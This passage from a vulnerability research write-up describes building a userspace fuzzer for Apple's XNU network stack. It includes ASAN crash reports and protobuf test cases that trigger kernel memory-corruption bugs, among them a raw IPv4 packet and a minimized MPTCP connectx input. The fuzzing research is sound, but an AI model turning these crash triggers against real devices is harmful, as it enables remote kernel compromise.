Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by userspace, so whenever the kernel wants to access memory mapped in userspace, it goes through the intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests.

Here’s a backtrace from our stub before we implement copyin. As you can see, when calling the recvfrom syscall, our fuzzer passed in a pointer as an argument.

    #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3

    #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9

    #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11

    #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10

    #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9

    #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit.

int __attribute__((warn_unused_result))
copyin(void* user_addr, void* kernel_addr, size_t nbytes) {
  // Address 1 means use fuzzed bytes, otherwise use real bytes.
  // NOTE: this does not support nested useraddr.
  if (user_addr != (void*)1) {
    memcpy(kernel_addr, user_addr, nbytes);
    return 0;
  }
  if (get_fuzzed_bool()) {
    return -1;
  }
  get_fuzzed_bytes(kernel_addr, nbytes);
  return 0;
}

Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.
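
The copyout behavior described above could be sketched roughly as follows. This is a minimal illustration rather than the fuzzer's actual code: the names `FUZZ_ADDR`, `fake_copyout`, and `copyout_scratch` are hypothetical, the argument order is an assumption, and the fuzzed failure path used in copyin is left out for brevity.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical name for the sentinel "don't care" user address. */
#define FUZZ_ADDR ((void *)1)

/* Hypothetical scratch buffer that absorbs copies to the sentinel address. */
unsigned char copyout_scratch[4096];

/*
 * Sketch of a fake copyout. The kernel source buffer is read in full in
 * both branches, so a sanitizer can flag out-of-bounds or use-after-free
 * reads even when the test case does not care about the copied data.
 */
int fake_copyout(const void *kernel_addr, void *user_addr, size_t nbytes) {
  if (user_addr != FUZZ_ADDR) {
    /* The test case supplied a real destination buffer. */
    memcpy(user_addr, kernel_addr, nbytes);
    return 0;
  }
  /* Sentinel destination: stream the source through the scratch buffer. */
  const unsigned char *src = kernel_addr;
  while (nbytes > 0) {
    size_t chunk = nbytes < sizeof(copyout_scratch) ? nbytes
                                                    : sizeof(copyout_scratch);
    memcpy(copyout_scratch, src, chunk);
    src += chunk;
    nbytes -= chunk;
  }
  return 0;
}
```

A global scratch buffer is used here so that an optimizing compiler cannot discard the copy; a heap-allocated temporary would work equally well in a sanitizer build.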

Synchronization and Threads

Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level “sequences” are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective than it turned out to be. The cooperative model did achieve the goal of removing threading-related headaches from deploying the fuzzer, but the lack of real thread interleaving is a serious weakness that I would like to address in future fuzzer revisions.
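
The conversion from a looping worker thread to a single-step function can be pictured with the sketch below. It is only an illustration of the idea under simple assumptions: `work_queue`, `worker_step`, and `run_fuzzed_schedule` are hypothetical names, and the "work" is a trivial sum standing in for real kernel processing.

```c
#include <stdbool.h>
#include <stddef.h>

#define QUEUE_CAP 16

/* Hypothetical pending-work queue that a kernel worker thread would drain. */
struct work_queue {
  int items[QUEUE_CAP];
  size_t head;
  size_t count;
  int processed_sum; /* stand-in for the side effects of doing the work */
};

/* Queue one item; returns false when the queue is full. */
bool work_enqueue(struct work_queue *q, int item) {
  if (q->count == QUEUE_CAP) {
    return false;
  }
  q->items[(q->head + q->count) % QUEUE_CAP] = item;
  q->count++;
  return true;
}

/*
 * The threaded original would be `for (;;) { wait for work; process it; }`.
 * This version performs at most one iteration and returns, so the fuzzer
 * decides when (and whether) the worker runs.
 */
bool worker_step(struct work_queue *q) {
  if (q->count == 0) {
    return false; /* the real thread would block here; return early instead */
  }
  q->processed_sum += q->items[q->head];
  q->head = (q->head + 1) % QUEUE_CAP;
  q->count--;
  return true;
}

/*
 * Drive the worker from fuzzer-chosen bytes: a nonzero byte requests one
 * step, a zero byte skips. Returns how many steps actually did work.
 */
size_t run_fuzzed_schedule(struct work_queue *q, const unsigned char *sched,
                           size_t len) {
  size_t steps = 0;
  for (size_t i = 0; i < len; i++) {
    if (sched[i] != 0 && worker_step(q)) {
      steps++;
    }
  }
  return steps;
}
```

Because the schedule is just data in the test case, the same input always replays the same interleaving of "thread" work and syscalls, which is where the determinism benefit comes from.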

Randomness

Randomness is another service provided by kernels to userland (e.g. /dev/random) and in-kernel services requiring it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_provider field.
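
As a rough sketch of that idea, a fake random source can simply hand out the next bytes of the test case. The names `fuzz_data` and `fake_read_random` are hypothetical, and zero-filling once the input is exhausted is an assumption made here for illustration; the text above does not say what happens in that case.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical view of the current test case's data_provider bytes. */
struct fuzz_data {
  const unsigned char *bytes;
  size_t len;
  size_t pos;
};

/*
 * Fill `out` with the next `nbytes` of fuzzer input. When the input runs
 * out, the remainder is zero-filled (an assumption of this sketch) so the
 * result depends only on the test case.
 */
void fake_read_random(struct fuzz_data *fd, void *out, size_t nbytes) {
  size_t avail = fd->len - fd->pos;
  size_t take = nbytes < avail ? nbytes : avail;
  if (take > 0) {
    memcpy(out, fd->bytes + fd->pos, take);
    fd->pos += take;
  }
  if (nbytes > take) {
    memset((unsigned char *)out + take, 0, nbytes - take);
  }
}
```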

Authentication

XNU features some mechanisms (KAuth, mac checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol, given its KAuth credentials:

static int
socket_common(struct proc *p,
    int domain,
    int type,
    int protocol,
    pid_t epid,
    int32_t *retval,
    int delegate)
{
        struct socket *so;
        struct fileproc *fp;
        int fd, error;
        AUDIT_ARG(socket, domain, type, protocol);
#if CONFIG_MACF_SOCKET_SUBSET
        if ((error = mac_socket_check_create(kauth_cred_get(), domain,
            type, protocol)) != 0) {
                return error;
        }
#endif /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash as this functionality was stubbed.

    #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3
    #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3
    #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39
    #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9
    #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10
    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used).

void* kauth_cred_get() {
  return (void*)1;
}

Now we crash actually checking the KAuth permissions.

    #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3
    #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33
    #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15
    #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9
    #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10
    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19
    #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

int mac_socket_check_create() { return 0; }

As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.

This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving “soundness” or “completeness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums)). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.
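
To make the bottom-up idea concrete, here is a small sketch of a switch whose selector can be overridden by fuzzer input. Everything in it is hypothetical: `opt_kind`, `consume_enum`, and `handle_option` are illustrative names, the `unsound` flag stands in for a fuzzer-only build setting, and the real change would be made in the kernel's option parser.

```c
#include <stddef.h>

/* Hypothetical option codes standing in for the cases of a kernel switch. */
enum opt_kind { OPT_NOP = 1, OPT_RECORD_ROUTE = 7, OPT_TIMESTAMP = 68 };

static const enum opt_kind valid_opts[] = {OPT_NOP, OPT_RECORD_ROUTE,
                                           OPT_TIMESTAMP};

/* Map one fuzzer-provided byte onto one of the valid enum values. */
enum opt_kind consume_enum(unsigned char fuzz_byte) {
  size_t n = sizeof(valid_opts) / sizeof(valid_opts[0]);
  return valid_opts[fuzz_byte % n];
}

/*
 * When `unsound` is nonzero, the parsed value is ignored and the fuzzer
 * picks the case directly. Returns an identifier for the branch taken,
 * or 0 for the default case.
 */
int handle_option(int parsed_opt, int unsound, unsigned char fuzz_byte) {
  int opt = unsound ? (int)consume_enum(fuzz_byte) : parsed_opt;
  switch (opt) {
  case OPT_NOP:
    return 1;
  case OPT_RECORD_ROUTE:
    return 2;
  case OPT_TIMESTAMP:
    return 3;
  default:
    return 0;
  }
}
```

With `unsound` set, every case is reachable from a single input byte, which is exactly why crashes found this way still need to be confirmed against the unmodified parser.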

Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all-or-nothing, one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But even after several months of work and several useful bug reports, this project is still remarkably far from the finish line. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I’d like to cover one example to demonstrate the value of the “bottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling checksum verification is a well-known fuzzer-only modification, used when fuzzer authors know that valid checksums could be trivially generated by hand. But the same idea can also be applied in other places, such as packet delivery.
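
For readers unfamiliar with the checksum trick, a minimal sketch follows. `toy_checksum` and `packet_checksum_ok` are hypothetical, and the checksum itself is a toy sum rather than any real protocol checksum. The macro `FUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION` is the name conventionally defined for fuzzing-only builds in libFuzzer-style setups; whether this project uses it is not stated in the text.

```c
#include <stddef.h>
#include <stdint.h>

/* Toy additive checksum, for illustration only. */
uint16_t toy_checksum(const uint8_t *data, size_t len) {
  uint32_t sum = 0;
  for (size_t i = 0; i < len; i++) {
    sum += data[i];
  }
  return (uint16_t)(sum & 0xffff);
}

/* Returns 1 if the packet should be accepted, 0 otherwise. */
int packet_checksum_ok(const uint8_t *data, size_t len, uint16_t claimed) {
#ifdef FUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION
  /* Fuzzing build: accept everything so mutated packets are not rejected
   * before they reach the interesting parsing code. */
  (void)data;
  (void)len;
  (void)claimed;
  return 1;
#else
  return toy_checksum(data, len) == claimed;
#endif
}
```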

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing protocol control block (PCB) for that connection, as seen below.

void
tcp_input(struct mbuf *m, int off0)
{
// ...
#if INET6
        if (isipv6) {
            inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport,
                &ip6->ip6_dst, th->th_dport, 1,
                m->m_pkthdr.rcvif);
        } else
#endif /* INET6 */
        inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport,
            ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif);

Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug.

/*
 * Lookup PCB in hash list.
 */
struct inpcb *
in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr,
    u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard,
    struct ifnet *ifp)
{
// ...
    head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport,
        pcbinfo->ipi_hashmask)];
    LIST_FOREACH(inp, head, inp_hash) {
-               if (inp->inp_faddr.s_addr == faddr.s_addr &&
-                   inp->inp_laddr.s_addr == laddr.s_addr &&
-                   inp->inp_fport == fport &&
-                   inp->inp_lport == lport) {
+               if (!get_fuzzed_bool()) {
                        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) !=
                            WNT_STOPUSING) {
                                lck_rw_done(pcbinfo->ipi_lock);
                                return inp;

Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this as lookups become O(n), but we only create a few sockets, so it’s acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h
index a5ec42ab..37f6ee50 100644
--- a/bsd/netinet/in_pcb.h
+++ b/bsd/netinet/in_pcb.h
@@ -611,10 +611,9 @@ struct inpcbinfo {
        u_int32_t               ipi_flags;
 };
-#define INP_PCBHASH(faddr, lport, fport, mask) \
-       (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask))
-#define INP_PCBPORTHASH(lport, mask) \
-       (ntohs((lport)) & (mask))
+// nedwill: let all pcbs share the same hash
+#define        INP_PCBHASH(faddr, lport, fport, mask) (0)
+#define        INP_PCBPORTHASH(lport, mask) (0)
 #define INP_IS_FLOW_CONTROLLED(_inp_) \
        ((_inp_)->inp_flags & INP_FLOW_CONTROLLED)

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58
WRITE of size 20 at 0x61d00029f474 thread T0
    #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3
    #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3
    #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2
    #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2
    #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34
    #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3
    #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7
    #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80)
allocated by thread T0 here:
    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
    #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45
    #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12
    #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6
    #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7
    #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2
    #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34
    #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3
    #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7
    #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path.

commands {
  ip_input {
    raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"

  }
}
data_provider: ""

If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange though. Why is it crashing during garbage collection in mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn’t catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, importantly the upcoming MTE. This means we don’t catch the bug until later, when a randomly corrupted pointer is accessed.
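
The sketch below illustrates why an overflow that stays inside one allocation goes unnoticed. It is not the MPTCP code: `struct session`, its fields, and `unchecked_fill` are hypothetical stand-ins for a kernel object with a buffer followed by a pointer.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical object: a fixed-size buffer followed by a pointer field. */
struct session {
  char addr_buf[8];
  void *owned_ptr;
};

/*
 * Copies `len` bytes to the start of addr_buf without checking `len`
 * against sizeof(addr_buf). As long as `len` does not exceed
 * sizeof(struct session), every written byte stays inside the object's own
 * allocation, so no redzone is touched and nothing is reported at the time
 * of the write. The damage only shows up later, for example when
 * owned_ptr is freed or dereferenced.
 */
void unchecked_fill(struct session *s, const void *src, size_t len) {
  memcpy((char *)s + offsetof(struct session, addr_buf), src, len);
}
```

Calling `unchecked_fill` with a payload of `sizeof(struct session)` bytes silently replaces `owned_ptr`, which mirrors how the report above surfaces in a later free rather than at the original write.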

==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0
    #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3
    #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36
    #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3
    #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3
    #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16
    #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3
    #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18)
allocated by thread T0 here:
    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
    #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10
    #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8
    #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15
    #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10
    #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10
    #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9
    #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11
    #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9
    #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10
    #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here’s the protobuf input for the crashing testcase:

commands {
  socket {
    domain: AF_MULTIPATH
    so_type: SOCK_STREAM
    protocol: IPPROTO_IP
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_0
      sae_srcaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }
      }
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: ""
        }
      }
    }
    associd: ASSOCID_CASE_0
    flags: CONNECT_DATA_IDEMPOTENT
    flags: CONNECT_DATA_IDEMPOTENT
    flags: CONNECT_DATA_IDEMPOTENT
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_0
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: ""
        }
      }
    }
    associd: ASSOCID_CASE_0
    flags: CONNECT_DATA_IDEMPOTENT
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_0
      sae_srcaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: ""
        }
      }
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }
      }
    }
    associd: ASSOCID_CASE_0
    flags: CONNECT_DATA_IDEMPOTENT
    flags: CONNECT_DATA_IDEMPOTENT
    flags: CONNECT_DATA_AUTHENTICATED
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_0
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: ""
        }
      }
    }
    associd: ASSOCID_CASE_0
    flags: CONNECT_DATA_IDEMPOTENT
  }
}
commands {
  close {
    fd: FD_8
  }
}
commands {
  ioctl_real {
    siocsifflags {
      ifr_name: LO0
      flags: IFF_LINK1
    }
  }
}
commands {
  close {
    fd: FD_8
  }
}
data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {
  socket {
    domain: AF_MULTIPATH
    so_type: SOCK_STREAM
    protocol: IPPROTO_IP
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_1
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131

        }
      }
    }
    associd: ASSOCID_CASE_0
  }
}
data_provider: ""

This is a lot easier to read! It appears that SockFuzzer managed to open a socket from the AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. Then the large sa_data field was used to overwrite memory. You can see some artifacts of heuristics used by the fuzzer to guess strings as “listen” and “mbuf” appear in the input. This testcase could be further simplified by modifying the sa_data to a repeated character, but I left it as is so you can see exactly what it’s like to work with the output of this fuzzer.

In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous post describing the “SockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {
  socket {
    domain: AF_INET6
    so_type: SOCK_RAW
    protocol: IPPROTO_IP
  }
}
commands {
  set_sock_opt {
    level: SOL_SOCKET
    name: SO_RCVBUF
    val: "\021\000\000\000"
